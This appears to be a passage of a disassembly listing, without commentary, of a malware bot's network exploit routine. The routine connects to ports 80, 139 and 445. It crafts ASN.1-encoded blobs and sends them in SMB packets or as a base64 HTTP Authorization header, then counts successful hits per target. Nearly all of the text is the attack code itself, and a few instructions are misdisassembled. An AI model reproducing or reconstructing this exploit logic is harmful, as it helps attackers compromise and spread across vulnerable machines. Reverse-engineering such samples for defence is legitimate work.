lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-240h]
call sub_40E367
add esp, 14h
loc_4020FA: ; CODE XREF: seg000:004020D5�j
lea eax, [ebp-440h]
push eax
call sub_407E0E
push dword ptr [ebp-0BCh]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
mov eax, ds:6083C18Bh ; CODE XREF: sub_40238E+E�p
; sub_40238E+33�p ...
add al, 0
and dword ptr [eax], 0
retn
; =============== S U B R O U T I N E =======================================
sub_402124 proc near ; CODE XREF: sub_40238E+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_410C0F
mov edi, eax
pop ecx
test edi, edi
jz short loc_402156
push ebx
push 0
push edi
call sub_410590
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_4105F0
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_402156: ; CODE XREF: sub_402124+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_402124 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40215E proc near ; CODE XREF: sub_402258+18�p
; sub_4022D2+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_410C0F
mov esi, eax
pop ecx
test esi, esi
jz short loc_4021AA
push edi
push 0
push esi
call sub_410590
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_4105F0
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4105F0
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_4021AA: ; CODE XREF: sub_40215E+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40215E endp
; =============== S U B R O U T I N E =======================================
sub_4021B3 proc near ; CODE XREF: sub_402258+5E�p
; sub_402258+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4021C3
push eax
call sub_410C83
pop ecx
loc_4021C3: ; CODE XREF: sub_4021B3+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_4021B3 endp
; =============== S U B R O U T I N E =======================================
sub_4021CC proc near ; CODE XREF: sub_402258+20�p
; sub_402333+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4021F9
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_410C0F
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4021FD
loc_4021F9: ; CODE XREF: sub_4021CC+D�j
xor al, al
jmp short loc_402254
; ---------------------------------------------------------------------------
loc_4021FD: ; CODE XREF: sub_4021CC+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_410590
add esp, 0Ch
cmp ebx, 1
jnz short loc_402222
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40223C
; ---------------------------------------------------------------------------
loc_402222: ; CODE XREF: sub_4021CC+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_40223C: ; CODE XREF: sub_4021CC+54�j
push eax
call sub_4105F0
add esp, 0Ch
push dword ptr [esi]
call sub_410C83
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_402254: ; CODE XREF: sub_4021CC+2F�j
pop edi
pop esi
pop ebx
retn
sub_4021CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402258 proc near ; CODE XREF: sub_40238E+89�p
; sub_40238E+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_42F3E4
call sub_40215E
lea ecx, [ebp+var_8]
call sub_4021CC
mov eax, [ebp+var_4]
inc eax
push eax
call sub_410C0F
mov edi, eax
pop ecx
test edi, edi
jnz short loc_402292
xor al, al
jmp short loc_4022CE
; ---------------------------------------------------------------------------
loc_402292: ; CODE XREF: sub_402258+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_410590
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_4105F0
add esp, 18h
mov ecx, esi
call sub_4021B3
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_4021B3
mov al, 1
loc_4022CE: ; CODE XREF: sub_402258+38�j
pop edi
pop esi
leave
retn
sub_402258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022D2 proc near ; CODE XREF: sub_402306+14�p
; sub_402323+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40215E
mov ecx, esi
call sub_4021B3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_4022D2 endp
; =============== S U B R O U T I N E =======================================
sub_402306 proc near ; CODE XREF: sub_40238E+F0�p
; sub_40238E+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_410B60
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_4022D2
pop esi
retn 4
sub_402306 endp
; =============== S U B R O U T I N E =======================================
sub_402323 proc near ; CODE XREF: sub_40236F+B�p
; sub_40238E+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4022D2
retn 8
sub_402323 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402333 proc near ; CODE XREF: sub_40236F+16�p
; sub_40238E+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_4021CC
test al, al
jz short loc_40236C
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_41F1BC
call sub_40215E
mov ecx, esi
call sub_4021B3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40236C: ; CODE XREF: sub_402333+F�j
pop esi
leave
retn
sub_402333 endp
; =============== S U B R O U T I N E =======================================
sub_40236F proc near ; CODE XREF: sub_40238E+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_402323
test al, al
jz short loc_40238A
mov ecx, esi
call sub_402333
loc_40238A: ; CODE XREF: sub_40236F+12�j
pop esi
retn 8
sub_40236F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40238E proc near ; CODE XREF: seg000:00402C13�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call near ptr loc_402119+1
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_4026E2
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_4026E2
push esi
lea ecx, [ebp+var_30]
call near ptr loc_402119+1
lea ecx, [ebp+var_20]
call near ptr loc_402119+1
lea ecx, [ebp+var_50]
call near ptr loc_402119+1
lea ecx, [ebp+var_18]
call near ptr loc_402119+1
lea ecx, [ebp+var_40]
call near ptr loc_402119+1
lea ecx, [ebp+var_38]
call near ptr loc_402119+1
lea ecx, [ebp+var_28]
call near ptr loc_402119+1
push 4
push offset dword_41EE5C
lea ecx, [ebp+var_30]
call sub_4022D2
push 3
push offset dword_41EE64
lea ecx, [ebp+var_30]
call sub_4022D2
lea ecx, [ebp+var_30]
call sub_402258
lea ecx, [ebp+var_30]
call sub_402333
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_410590
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset dword_41EE50
call sub_4022D2
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_4022D2
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_4022D2
lea ecx, [ebp+var_20]
call sub_402258
push offset dword_41F1E4
lea ecx, [ebp+var_50]
call sub_402306
lea ecx, [ebp+var_50]
call sub_402258
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_402124
lea ecx, [ebp+var_58]
call sub_402258
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40236F
lea ecx, [ebp+var_58]
call sub_4021B3
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_410590
add esp, 0Ch
push offset dword_41F1DC
lea ecx, [ebp+var_18]
call sub_402306
push 4
push offset dword_41EE68
lea ecx, [ebp+var_18]
call sub_4022D2
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_4022D2
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_4022D2
lea ecx, [ebp+var_18]
call sub_402258
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_402323
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_402323
lea ecx, [ebp+var_40]
call sub_402333
lea ecx, [ebp+var_18]
call sub_4021B3
lea ecx, [ebp+var_50]
call sub_4021B3
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_402323
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_402323
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_402323
lea ecx, [ebp+var_38]
call sub_402333
lea ecx, [ebp+var_20]
call sub_4021B3
lea ecx, [ebp+var_30]
call sub_4021B3
lea ecx, [ebp+var_40]
call sub_4021B3
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_4022D2
lea ecx, [ebp+var_28]
call sub_402258
push 2
push offset dword_41F1D8
lea ecx, [ebp+var_28]
call sub_4022D2
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_402323
lea ecx, [ebp+var_28]
call sub_402333
lea ecx, [ebp+var_38]
call sub_4021B3
lea ecx, [ebp+var_10]
call near ptr loc_402119+1
lea ecx, [ebp+var_8]
call near ptr loc_402119+1
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_402323
lea ecx, [ebp+var_10]
call sub_4021CC
lea ecx, [ebp+var_28]
call sub_4021B3
push offset dword_41F1D4
lea ecx, [ebp+var_8]
call sub_402306
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402323
lea ecx, [ebp+var_8]
call sub_4021CC
lea ecx, [ebp+var_10]
call sub_4021B3
push offset dword_41F1D0
lea ecx, [ebp+var_10]
call sub_402306
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_402323
lea ecx, [ebp+var_10]
call sub_4021CC
lea ecx, [ebp+var_8]
call sub_4021B3
push offset dword_41F1C4
lea ecx, [ebp+var_8]
call sub_402306
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402323
lea ecx, [ebp+var_8]
call sub_4021CC
lea ecx, [ebp+var_10]
call sub_4021B3
push offset dword_41F1C0
lea ecx, [ebp+var_48]
call sub_402306
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_402323
lea ecx, [ebp+var_8]
call sub_4021B3
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_4026F0
; ---------------------------------------------------------------------------
loc_4026E2: ; CODE XREF: sub_40238E+1B�j
; sub_40238E+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_4026F0: ; CODE XREF: sub_40238E+352�j
pop edi
pop ebx
leave
retn
sub_40238E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026F4 proc near ; CODE XREF: sub_4027B8+A1�p
; sub_4027B8+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_41C1B0 ; select
cmp eax, edi
jnz short loc_40275B
lea eax, [ebp+var_10C]
push eax
push esi
call sub_41AFF8 ; __WSAFDIsSet
test eax, eax
jnz short loc_40275F
loc_40275B: ; CODE XREF: sub_4026F4+54�j
xor eax, eax
jmp short loc_40276F
; ---------------------------------------------------------------------------
loc_40275F: ; CODE XREF: sub_4026F4+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4307AC
loc_40276F: ; CODE XREF: sub_4026F4+69�j
pop edi
pop esi
leave
retn
sub_4026F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402773 proc near ; CODE XREF: sub_4027B8+81�p
; sub_4027B8+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_430790
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4307E0
cmp eax, 4
jz short loc_40279D
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40279D: ; CODE XREF: sub_402773+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4307E0
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_402773 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027B8 proc near ; CODE XREF: sub_402892+48�p
; seg000:00402D0E�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_410C0F
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4027E1
xor al, al
jmp loc_40288D
; ---------------------------------------------------------------------------
loc_4027E1: ; CODE XREF: sub_4027B8+20�j
push ebx
push 0
push esi
call sub_410590
push 2Fh
push offset dword_41EEF8
push esi
call sub_4105F0
push 8
lea eax, [esi+31h]
push offset dword_41EF28
push eax
mov [esi+2Fh], di
call sub_4105F0
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_4105F0
push 6
add ebx, edi
push offset dword_42F3DC
push ebx
call sub_4105F0
mov ebx, [ebp+arg_0]
push 85h
push offset dword_41EE70
push ebx
call sub_402773
add esp, 48h
test al, al
jnz short loc_402849
loc_402845: ; CODE XREF: sub_4027B8+B5�j
xor bl, bl
jmp short loc_402884
; ---------------------------------------------------------------------------
loc_402849: ; CODE XREF: sub_4027B8+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_4026F4
push [ebp+var_4]
push esi
push ebx
call sub_402773
add esp, 1Ch
test al, al
jz short loc_402845
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_4026F4
add esp, 10h
mov bl, 1
loc_402884: ; CODE XREF: sub_4027B8+8F�j
push esi
call sub_410C83
pop ecx
mov al, bl
loc_40288D: ; CODE XREF: sub_4027B8+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_4027B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402892 proc near ; CODE XREF: seg000:00402CF4�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset dword_41EF34
push [ebp+arg_0]
call ds:dword_41C1CC ; send
cmp eax, 48h
jnz short loc_4028CD
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_4026F4
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_4028CD
cmp [ebp+var_20], 82h
jz short loc_4028D1
loc_4028CD: ; CODE XREF: sub_402892+1B�j
; sub_402892+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4028D1: ; CODE XREF: sub_402892+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4027B8
add esp, 0Ch
leave
retn
sub_402892 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028E4 proc near ; CODE XREF: sub_402930+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_41C220
call sub_410DD4
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_41C218
fstp [esp+10h+var_10]
call sub_410CB2
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_410DD4
inc eax
leave
retn
sub_4028E4 endp
; =============== S U B R O U T I N E =======================================
sub_402930 proc near ; CODE XREF: sub_402AD2+24�p
var_40 = qword ptr -40h
mov eax, offset loc_41B157
call sub_4112A0
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_402FA7
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_4028E4
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_402972
push edi
push eax
lea ecx, [ebp-38h]
call sub_402F22
loc_402972: ; CODE XREF: sub_402930+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_402A8F
mov ebx, [ebp+10h]
loc_402981: ; CODE XREF: sub_402930+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40298B
push 3
jmp short loc_40299D
; ---------------------------------------------------------------------------
loc_40298B: ; CODE XREF: sub_402930+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_402995
push 2
jmp short loc_40299D
; ---------------------------------------------------------------------------
loc_402995: ; CODE XREF: sub_402930+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40299E
push 1
loc_40299D: ; CODE XREF: sub_402930+59�j
; sub_402930+63�j
pop ebx
loc_40299E: ; CODE XREF: sub_402930+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_41C230
fstp [esp+40h+var_40]
call sub_410DFB
pop ecx
pop ecx
call sub_410DD4
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_4029DD
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_4029DD: ; CODE XREF: sub_402930+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_402A4B
add [ebp-18h], eax
loc_402A2F: ; CODE XREF: sub_402930+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, ds:byte_41EF80[eax]
push eax
push 1
call sub_402DA4
inc esi
cmp esi, [ebp-1Ch]
jb short loc_402A2F
loc_402A4B: ; CODE XREF: sub_402930+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_402A69
push dword ptr [ebp+14h]
call sub_410B60
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_402DFD
mov [ebp-18h], edi
loc_402A69: ; CODE XREF: sub_402930+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_402A83
sub esi, [ebp-1Ch]
loc_402A74: ; CODE XREF: sub_402930+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_402DA4
dec esi
jnz short loc_402A74
loc_402A83: ; CODE XREF: sub_402930+13F�j
cmp [ebp+10h], edi
ja loc_402981
push 1
pop ebx
loc_402A8F: ; CODE XREF: sub_402930+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_402FA7
push ds:dword_41C228
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_402E54
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_402FA7
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_402930 endp
; =============== S U B R O U T I N E =======================================
sub_402AD2 proc near ; CODE XREF: seg000:00402CD7�p
mov eax, offset loc_41B174
call sub_4112A0
sub esp, 10h
push ebx
push esi
push edi
push offset dword_42F3E8
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_402930
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_410C0F
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_402B1C
xor bl, bl
jmp short loc_402B60
; ---------------------------------------------------------------------------
loc_402B1C: ; CODE XREF: sub_402AD2+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_41C238
cmp ecx, ebx
jnz short loc_402B2A
mov ecx, eax
loc_402B2A: ; CODE XREF: sub_402AD2+54�j
cmp [ebp+18h], ebx
jz short loc_402B32
mov eax, [ebp+18h]
loc_402B32: ; CODE XREF: sub_402AD2+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_410A8A
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_4307E0
cmp eax, esi
jz short loc_402B57
xor bl, bl
jmp short loc_402B59
; ---------------------------------------------------------------------------
loc_402B57: ; CODE XREF: sub_402AD2+7F�j
mov bl, 1
loc_402B59: ; CODE XREF: sub_402AD2+83�j
push edi
call sub_410C83
pop ecx
loc_402B60: ; CODE XREF: sub_402AD2+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_402FA7
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_402FA7
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_402AD2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 624h
and byte ptr [ebp-424h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-423h]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-424h]
push offset dword_41F12C
push eax
call sub_4105F0
add esp, 0Ch
mov eax, offset byte_423068
push eax
push eax
push ds:dword_42F3F0
push dword ptr [ebp+8]
call sub_407435
pop ecx
push eax
push offset dword_41F1FC
lea eax, [ebp-395h]
push 400h
push eax
call sub_410A8A
add eax, 90h
push eax
lea eax, [ebp-424h]
push eax
push 164h
lea eax, [ebp-24h]
push offset dword_41EFC4
push eax
call sub_40238E
mov ecx, [eax]
xor esi, esi
mov [ebp-8], ecx
add esp, 30h
mov eax, [eax+4]
cmp eax, esi
mov [ebp-4], eax
jnz short loc_402C33
xor eax, eax
jmp loc_402D97
; ---------------------------------------------------------------------------
loc_402C33: ; CODE XREF: seg000:00402C2A�j
mov [ebp-0Ch], esi
loc_402C36: ; CODE XREF: seg000:00402D36�j
test esi, esi
jnz loc_402D3C
push 6
push 1
push 2
call ds:dword_41C1C0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_402D24
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call ds:dword_430794
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_4307D0
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call ds:dword_430740
cmp eax, 0FFFFFFFFh
jz loc_402D19
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_402CE1
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_402FA7
lea eax, [ebp+0Ch]
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_402FE3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_402AD2
add esp, 1Ch
jmp short loc_402D16
; ---------------------------------------------------------------------------
loc_402CE1: ; CODE XREF: seg000:00402C9F�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_402CFB
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_402892
jmp short loc_402D13
; ---------------------------------------------------------------------------
loc_402CFB: ; CODE XREF: seg000:00402CEB�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_402D19
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_4027B8
loc_402D13: ; CODE XREF: seg000:00402CF9�j
add esp, 0Ch
loc_402D16: ; CODE XREF: seg000:00402CDF�j
movzx esi, al
loc_402D19: ; CODE XREF: seg000:00402C92�j
; seg000:00402D05�j
push ebx
call ds:dword_430828
test esi, esi
jnz short loc_402D2F
loc_402D24: ; CODE XREF: seg000:00402C4F�j
push 3E8h
call ds:dword_41C058 ; Sleep
loc_402D2F: ; CODE XREF: seg000:00402D22�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_402C36
loc_402D3C: ; CODE XREF: seg000:00402C38�j
lea ecx, [ebp-8]
call sub_4021B3
test esi, esi
jz short loc_402D95
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset word_41FFCA
push eax
push offset dword_41F1F0
lea eax, [ebp-624h]
push 200h
push eax
call sub_410A8A
lea eax, [ebp-624h]
push eax
call sub_407E0E
mov eax, [ebp+0B0h]
add esp, 18h
imul eax, 3Ch
inc ds:dword_41FFF0[eax]
lea eax, dword_41FFF0[eax]
loc_402D95: ; CODE XREF: seg000:00402D46�j
mov eax, esi
